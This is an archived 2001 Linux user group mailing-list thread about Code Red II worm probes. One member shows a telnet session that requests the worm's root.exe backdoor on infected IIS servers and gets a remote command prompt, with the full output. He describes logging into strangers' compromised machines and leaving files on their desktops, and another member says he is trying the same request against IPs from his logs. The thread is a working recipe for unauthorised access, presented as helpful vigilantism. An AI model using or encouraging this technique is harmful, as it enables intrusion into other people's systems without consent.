CR worm infection attempts
Gary Nichols
plug-discuss@lists.PLUG.phoenix.az.us
05 Aug 2001 21:20:44 -0700
To answer your question... make sure you're hitting enter TWICE after
the command.
As a security guy myself, I'm deeply troubled by what I'm finding.
Check it out:
[gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80
Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx.
Escape character is '^]'.
GET /scripts/root.exe HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 06 Aug 2001 04:22:13 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>
From here, I've been leaving a nice text file on \\ALL USERS\\ desktop's
that explains how I did it, and why they need to pay attention to
security patches. :)
Hopefully they won't take it the 'wrong' way.
~g~
On 05 Aug 2001 15:15:02 -0700, Craig White wrote:
> Wayne Conrad wrote:
> >
> > On Sun, 05 August 2001, "J.Francois" wrote:
> > > I got tired of counting and just started putting the info into my IDS page.
> > > That way I can send complaints and point them to a URL so I don't have to
> > > keep recreating the same data each time.
> >
> > Are you putting the IP's up too? Every one of the CRII infected boxes is rooted... I wonder about the goodness of publishing a list of known rooted boxes.
> > Wayne
> ________________________________________________
>
> I've been trying that out
>
> telnet ipaddress_from_my_httpd_access_log 80
>
> GET /scripts/root.exe HTTP/1.0
>
> but I can't get a command prompt - what am I missing?
>
> Craig
> ________________________________________________
> See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
>
> PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>